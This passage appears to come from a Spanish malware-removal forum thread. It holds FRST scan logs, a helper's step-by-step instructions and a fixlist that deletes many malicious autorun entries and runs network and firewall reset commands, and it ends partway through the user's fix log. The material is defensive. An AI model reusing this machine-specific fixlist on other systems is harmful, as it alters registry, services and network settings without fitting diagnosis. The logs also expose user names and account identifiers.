Error: (10/18/2019 11:56:32 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Apple Mobile Device Service terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 60000 milisegundos: Reiniciar el servicio.

Error: (10/18/2019 11:56:32 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Live ID Sign-in Assistant terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 10000 milisegundos: Reiniciar el servicio.

Error: (10/18/2019 11:56:32 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: El servicio SAMSUNG Mobile Connectivity Service se terminó de manera inesperada. Esto ha sucedido 1 veces.

Error: (10/18/2019 11:56:32 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: El servicio SpyHunter 5 Kernel Monitor se terminó de manera inesperada. Esto ha sucedido 1 veces.

Error: (10/18/2019 11:56:32 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Yandex.Browser Update Service terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 60000 milisegundos: Reiniciar el servicio.


CodeIntegrity:
===================================

Date: 2019-04-24 12:31:35.177
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\drivers\usbser.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2019-04-24 12:31:35.167
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\drivers\usbser.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2014-05-18 08:47:21.146
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

Date: 2014-04-26 12:45:34.442
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

Date: 2014-04-26 12:39:43.019
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

Date: 2014-04-26 12:33:41.217
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

Date: 2014-04-26 09:53:38.695
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

Date: 2014-04-26 09:33:53.469
Description: 
Integridad de código no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume2\Windows\System32\l3codeca.acm porque el conjunto de hashes de imagen por página no se encuentra en el sistema.

==================== Memory info =========================== 

BIOS: Award Software International, Inc. F15 09/16/2010
Motherboard: Gigabyte Technology Co., Ltd. P55A-UD4
Processor: Intel(R) Core(TM) i5 CPU 750 @ 2.67GHz
Percentage of memory in use: 97%
Total physical RAM: 4087.43 MB
Available physical RAM: 118.3 MB
Total Virtual: 8173.05 MB
Available Virtual: 3680.77 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:55.9 GB) (Free:2.75 GB) NTFS
Drive e: () (Fixed) (Total:931.41 GB) (Free:275.69 GB) NTFS ==>[system with boot components (obtained from drive)]


==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: DAAB2ADC)
Partition 1: (Active) - (Size=931.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 55.9 GB) (Disk ID: DAAB2AA4)
Partition 1: (Not Active) - (Size=55.9 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
11

Hola

:arrow_forward: MUY Importante :arrow_backward: Realiza una copia de seguridad del registro :

  • Para hacerlo descarga :arrow_forward: DelFix.exe( en tu escritorio).

  • Doble clic para ejecutarlo.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona -Ejecutar como Administrador-).

  • Atención, ahora marca/selecciona únicamente la casilla "Create registry backup", las demás NO.

  • Pulsar en Run.

Se abrirá el informe (DelFix.txt), guárdalo por si fuera necesario y cierra la herramienta.

A continuación :warning: con los demás programas cerrados ve a :arrow_forward: Inicio :arrow_forward: Ejecutar :arrow_forward: y escribe Notepad.exe.

  • Ahora debes copiar y pegar los códigos/líneas que están en el interior del recuadro de más abajo, dentro del Notepad.
START
CREATERESTOREPOINT:
CLOSEPROCESSES:
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [588704 2018-03-28] (Oracle America, Inc. -> Oracle Corporation)
HKLM\...\RunOnce: [1nzirzyvrg3] => C:\Program Files (x86)\Yhanj\679940659.exe [485888 2019-08-31] (FlyStreets) [File not signed]
HKLM\...\RunOnce: [vw5wpldbi0c] => C:\Program Files (x86)\Yhanj\25388233.exe [485888 2019-08-31] (FlyStreets) [File not signed]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [UM] => C:\Users\MrEidrian\AppData\Local\Temp\~wt42D9.tmp.exe [1620224 2017-05-08] (GMGP, LLC -> ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HolyFeather] => C:\Windows\rss\csrss.exe [4110848 2019-09-01] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6945495] => C:\Users\MrEidrian\AppData\Local\Temp\is-I1N5O.tmp\SubSurface.exe [975932 2019-08-30] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [9439892] => C:\Users\MrEidrian\AppData\Roaming\k50j3s3jucs\p5ev1tztqfo.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4ILMHV5EZ2V3JE9] => "C:\Program Files\F0MXGHZ02Y\F0MXGHZ02.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7217898] => C:\Users\MrEidrian\AppData\Local\Temp\is-MERL1.tmp\SubSurface.exe [975932 2019-08-30] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [O125LGFOY3G6T31] => "C:\Program Files\I97ZWYY3EF\I97ZWYY3E.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4743452] => C:\Users\MrEidrian\AppData\Roaming\1nbkkrpf1rp\qfmx3cmi3ih.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [clakem] => C:\Users\MrEidrian\AppData\Local\clakem.dll [16896 2019-09-01] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2142673] => C:\Users\MrEidrian\AppData\Roaming\20dlcgoxqtd\ivw5mp0s30m.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2086881] => C:\Users\MrEidrian\AppData\Roaming\nuuesycacej\ayqg1aamqpn.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [XMQCG00FHTCRTFT] => "C:\Program Files\Y6WMEPIUSU\TLDU6T8DN.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [CVT2BE4AKKPQDC4] => "C:\Program Files\5AK9ESEEM9\0O1G6W4XH.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4182939] => C:\Users\MrEidrian\AppData\Roaming\wt14qozdpuk\qwnay0btejc.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1924984] => C:\Users\MrEidrian\AppData\Roaming\xlms1jgbaxg\1nw2ett4lkb.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [EG72O69XGR2NRI3] => "C:\Program Files\FPS3CWAAGI\SEYILWGBG.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [VQ3JCBJ32B3IDR3] => "C:\Program Files\NV6887IMQU\NV6887IMQ.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7321231] => C:\Users\MrEidrian\AppData\Roaming\gm4bq44ahcr\4dvv12kuxq3.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [9740042] => C:\Users\MrEidrian\AppData\Roaming\3xazufz2y4k\4vrehfm0aoc.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [FT2B7Y4X2D4BTIN] => "C:\Program Files\F62HX9AXGE\F62HX9AXG.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [OHM9UGYB0NI0O8G] => "C:\Program Files\4BDF1E44L3\4BDF1E44L.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [U1H8A5MXG7UKM4N] => "C:\Program Files\FDHCVOQ991\FDHCVOQ99.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1707178] => C:\Users\MrEidrian\AppData\Roaming\fmxx3sek4uo\p2mstxqpzmv.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8727207] => C:\Users\MrEidrian\AppData\Roaming\nhoccyj3cu3\z21djuxtpah.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [N4V1FFCWTT3R47M] => "C:\Program Files\PI73AD7QWA\PI73AD7QW.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6836345] => C:\Users\MrEidrian\AppData\Roaming\4ts415injby\muaqqm5jd4g.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6780553] => C:\Users\MrEidrian\AppData\Roaming\fie55wruabi\h32b1t0rf2m.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1VDIM44SM0XTGBH] => "C:\Program Files\VFS9DXY4DZ\VFS9DXY4D.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5K8RSKT0FRWD1U1] => "C:\Program Files\KD8OOK3PXU\FRQVGOT8R.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8013299] => C:\Users\MrEidrian\AppData\Roaming\bq0w0v4ehgl\dneqojihonk.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2CDZK6WEL344Q5F] => "C:\Program Files\IXA6R4G9ZL\IXA6R4G9Z.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5098959] => C:\Users\MrEidrian\AppData\Roaming\pd3l2ezyqrz\lhnvmugbnee.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [D1RO0EW4268PN6X] => "C:\Program Files\79WHBWGJII\79WHBWGJI.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [492184] => "C:\Users\MrEidrian\AppData\Roaming\3jbnls3gby3\2fjvnacax2i.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2963468] => "C:\Users\MrEidrian\AppData\Roaming\fn13p1breks\vnlvulezyz5.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [SZ3KV9NIQILVXI1] => "C:\Program Files\8QTX5BB3DR\8QTX5BB3D.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HFMCGA4XKVDRDXC] => "C:\Program Files\8QTX5BB3DR\25A5XF0L8.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4803132] => "C:\Users\MrEidrian\AppData\Roaming\gesvmajhlfg\ynuzo1duzmd.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2384361] => "C:\Users\MrEidrian\AppData\Roaming\0detggqes1g\qsfbixptrvg.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7G878VHBN6DN0JZ] => "C:\Program Files\SYKN90SQV7\SYKN90SQV.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [PRC3JU63KR51Q0K] => "C:\Program Files\ZLBV4QGTBO\ZLBV4QGTB.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [U1ZFNNPAKOAKRTK] => C:\Program Files\V96MUHOC2O\V96MUHOC2.exe [1241600 2019-09-14] (3TD8MEEK5) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [ETUGVQRVE0X929G] => "C:\Program Files\PONTMLEVX8\PONTMLEVX.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1139294] => "C:\Users\MrEidrian\AppData\Roaming\oqxiyvagkqg\ihxpu3f52tt.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8215114] => "C:\Users\MrEidrian\AppData\Roaming\ec1hfdjbtxq\ljnddtb4hhv.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [CloudNet] => C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-10-18] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\MountPoints2: {200c15f6-214d-11e9-92c2-6cf049e1b2f6} - H:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\MountPoints2: {a8264345-284c-11e9-ae89-6cf049e1b2f6} - I:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\MountPoints2: {ab69be00-e5c1-11e7-86a6-6cf049e1b2f6} - H:\HiSuiteDownLoader.exe
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {0C18376E-CF1F-4DE5-9AB1-9A4AF3883FC0} - System32\Tasks\{33340A00-BC3E-4879-A6B1-0F8A69F911ED} => C:\Windows\system32\pcalua.exe -a "C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {84178B8E-D6FB-482F-8DB2-1BDCC2FB6E82} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {8F2ECB93-F014-417C-BDE5-9EFA963D7E95} - System32\Tasks\Microsoft\Windows\Time Synchronization\ViewUtcTime => C:\Users\MrEidrian\AppData\Roaming\\utctimer\\utc.exe
Task: {B5B8BC8D-597D-4885-A111-5B0AC028AD21} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4110848 2019-09-01] () [File not signed] <==== ATTENTION
Task: {D4B51A00-104D-48BC-9D4B-CF83A25366E5} - System32\Tasks\{2E3D2332-F591-4AC3-8C22-7B2CA38E767A} => C:\Windows\system32\pcalua.exe -a "C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
SearchScopes: HKLM-x32 -> DefaultScope value is missing
Toolbar: HKU\S-1-5-21-3862230028-3041123482-801023079-1000 -> No Name - {DB131C55-60C8-4ADC-84DC-9E76AB06E2DC} -  No File
Toolbar: HKU\S-1-5-21-3862230028-3041123482-801023079-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
FF Homepage: Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344 -> hxxp://www.bing.com/?pc=COS2&ptag=D090119-N0300A5089E7D110BC46F293F&form=CONMHP&conlogo=CT3331990
FF NewTab: Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344 -> hxxp://www.bing.com/?pc=COS2&ptag=D090119-N0300A5089E7D110BC46F293F&form=CONMHP&conlogo=CT3331990
FF Extension: (Mozilla Official) - C:\Users\MrEidrian\AppData\Roaming\Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344\Extensions\{14553439-2741-4e9d-b474-784f336f58c9} [2019-09-14] [not signed]
FF SearchPlugin: C:\Users\MrEidrian\AppData\Roaming\Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344\searchplugins\bing-lavasoft-ff59.xml [2019-09-01]
CHR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
CHR Extension: (Chrome Media Router) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-09-01]
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [npiecjlhkngdinoeekmccdbjdgclmnbk] - C:\Users\MrEidrian\AppData\Local\CRE\npiecjlhkngdinoeekmccdbjdgclmnbk.crx [2012-08-26]
OPR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
OPR Extension: (SaveFrom.net helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2019-09-01]
U2 YandexBrowserService; C:\Program Files (x86)\Yandex\YandexBrowser\19.7.2.455\service_update.exe [1596408 2019-08-01] (YANDEX LLC -> YANDEX LLC)
R1 ab6af3c5e932269c; C:\Windows\system32\drivers\ab6af3c5e932269c.sys [33984 2019-09-01] (BlockChain Advances Ltd -> FsFilter Network)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
U3 MBAMService; no ImagePath
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
2019-10-18 11:59 - 2019-10-18 11:59 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc
2019-10-18 11:39 - 2019-10-18 11:39 - 000003192 _____ C:\Windows\system32\Tasks\csrss
AlternateDataStreams: C:\Windows:nlsPreferences [898]
AlternateDataStreams: C:\ProgramData\Microsoft:fJFUreezaO2K2ZYH3ywW6T3Dvbx [2608]
AlternateDataStreams: C:\ProgramData\Microsoft:IMOG7FwadszVkLuwNcFnh [2380]
AlternateDataStreams: C:\ProgramData\Microsoft:O0QN96UemdV4kzQFhIX [2430]
AlternateDataStreams: C:\ProgramData\TEMP:054203E4 [290]
AlternateDataStreams: C:\ProgramData\TEMP:1AAB2E68 [183]
AlternateDataStreams: C:\ProgramData\TEMP:4BF2F6B5 [388]
AlternateDataStreams: C:\Users\MrEidrian\AppData\Local\Archivos temporales de Internet:atSLiHJlFjQbclYyr5KCL0i [2340]
AlternateDataStreams: C:\Users\MrEidrian\AppData\Local\desktop.ini:3a96398c0f384e4adf5faa1736aeaf96 [802]
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo [122]
FirewallRules: [{6588581F-D0E5-45F4-AB84-B96E33632494}] => (Allow) C:\Users\MrEidrian\AppData\Local\Yandex\YandexBrowser\Application\browser.exe (YANDEX LLC -> YANDEX LLC)
FirewallRules: [{20B9F341-EE09-4598-8EF0-78107FD8A1CB}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{D474C89E-0BBC-49AB-8D44-BDC288633E71}] => (Allow) C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]

HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END

Guárdalo bajo el nombre de FIXLIST.TXT en el escritorio :arrow_backward: Esto es muy importante.

:o: Nota :o: Es importante que la herramienta FRST.exe (Farbar Recovery Scanner Tool) y FIXLIST.TXT se encuentren en la misma ubicación (escritorio) o si no, no trabajara.


  • Ejecuta FRST.exe.(Si usas Windows Vista/7/8 o 10, presiona clic derecho y seleccionas -Ejecutar como Administrador-).
  • Presionar el botón FIX y aguardar a que termine.
  • La Herramienta guardara el reporte de reparación en el escritorio (FIXLOG.TXT).

Pega el contenido de este fichero en tu próxima respuesta.

Reiniciar el equipo y comprobar su funcionamiento en relación al problema planteado y comentarlo.

Un saludo

12 
Resultados de la corrección de Farbar Recovery Scan Tool (x64) Versión: 15-01-2020
Ejecutado por MrEidrian (17-01-2020 11:47:19) Run:1
Ejecutado desde C:\Users\MrEidrian\Desktop
Perfiles cargados: MrEidrian (Perfiles disponibles: MrEidrian & Noelia)
Modo de Inicio: Normal
==============================================

fixlist contenido:
*****************
START
CREATERESTOREPOINT:
CLOSEPROCESSES:
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [588704 2018-03-28] (Oracle America, Inc. -> Oracle Corporation)
HKLM\...\RunOnce: [1nzirzyvrg3] => C:\Program Files (x86)\Yhanj\679940659.exe [485888 2019-08-31] (FlyStreets) [File not signed]
HKLM\...\RunOnce: [vw5wpldbi0c] => C:\Program Files (x86)\Yhanj\25388233.exe [485888 2019-08-31] (FlyStreets) [File not signed]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [UM] => C:\Users\MrEidrian\AppData\Local\Temp\~wt42D9.tmp.exe [1620224 2017-05-08] (GMGP, LLC -> ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HolyFeather] => C:\Windows\rss\csrss.exe [4110848 2019-09-01] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6945495] => C:\Users\MrEidrian\AppData\Local\Temp\is-I1N5O.tmp\SubSurface.exe [975932 2019-08-30] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [9439892] => C:\Users\MrEidrian\AppData\Roaming\k50j3s3jucs\p5ev1tztqfo.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4ILMHV5EZ2V3JE9] => "C:\Program Files\F0MXGHZ02Y\F0MXGHZ02.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7217898] => C:\Users\MrEidrian\AppData\Local\Temp\is-MERL1.tmp\SubSurface.exe [975932 2019-08-30] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [O125LGFOY3G6T31] => "C:\Program Files\I97ZWYY3EF\I97ZWYY3E.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4743452] => C:\Users\MrEidrian\AppData\Roaming\1nbkkrpf1rp\qfmx3cmi3ih.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [clakem] => C:\Users\MrEidrian\AppData\Local\clakem.dll [16896 2019-09-01] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2142673] => C:\Users\MrEidrian\AppData\Roaming\20dlcgoxqtd\ivw5mp0s30m.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2086881] => C:\Users\MrEidrian\AppData\Roaming\nuuesycacej\ayqg1aamqpn.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [XMQCG00FHTCRTFT] => "C:\Program Files\Y6WMEPIUSU\TLDU6T8DN.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [CVT2BE4AKKPQDC4] => "C:\Program Files\5AK9ESEEM9\0O1G6W4XH.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4182939] => C:\Users\MrEidrian\AppData\Roaming\wt14qozdpuk\qwnay0btejc.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1924984] => C:\Users\MrEidrian\AppData\Roaming\xlms1jgbaxg\1nw2ett4lkb.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [EG72O69XGR2NRI3] => "C:\Program Files\FPS3CWAAGI\SEYILWGBG.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [VQ3JCBJ32B3IDR3] => "C:\Program Files\NV6887IMQU\NV6887IMQ.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7321231] => C:\Users\MrEidrian\AppData\Roaming\gm4bq44ahcr\4dvv12kuxq3.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [9740042] => C:\Users\MrEidrian\AppData\Roaming\3xazufz2y4k\4vrehfm0aoc.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [FT2B7Y4X2D4BTIN] => "C:\Program Files\F62HX9AXGE\F62HX9AXG.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [OHM9UGYB0NI0O8G] => "C:\Program Files\4BDF1E44L3\4BDF1E44L.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [U1H8A5MXG7UKM4N] => "C:\Program Files\FDHCVOQ991\FDHCVOQ99.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1707178] => C:\Users\MrEidrian\AppData\Roaming\fmxx3sek4uo\p2mstxqpzmv.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8727207] => C:\Users\MrEidrian\AppData\Roaming\nhoccyj3cu3\z21djuxtpah.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [N4V1FFCWTT3R47M] => "C:\Program Files\PI73AD7QWA\PI73AD7QW.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6836345] => C:\Users\MrEidrian\AppData\Roaming\4ts415injby\muaqqm5jd4g.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6780553] => C:\Users\MrEidrian\AppData\Roaming\fie55wruabi\h32b1t0rf2m.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1VDIM44SM0XTGBH] => "C:\Program Files\VFS9DXY4DZ\VFS9DXY4D.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5K8RSKT0FRWD1U1] => "C:\Program Files\KD8OOK3PXU\FRQVGOT8R.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8013299] => C:\Users\MrEidrian\AppData\Roaming\bq0w0v4ehgl\dneqojihonk.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2CDZK6WEL344Q5F] => "C:\Program Files\IXA6R4G9ZL\IXA6R4G9Z.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5098959] => C:\Users\MrEidrian\AppData\Roaming\pd3l2ezyqrz\lhnvmugbnee.exe [975932 2019-09-01] ( ) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [D1RO0EW4268PN6X] => "C:\Program Files\79WHBWGJII\79WHBWGJI.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [492184] => "C:\Users\MrEidrian\AppData\Roaming\3jbnls3gby3\2fjvnacax2i.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2963468] => "C:\Users\MrEidrian\AppData\Roaming\fn13p1breks\vnlvulezyz5.exe" /VERYSILENT
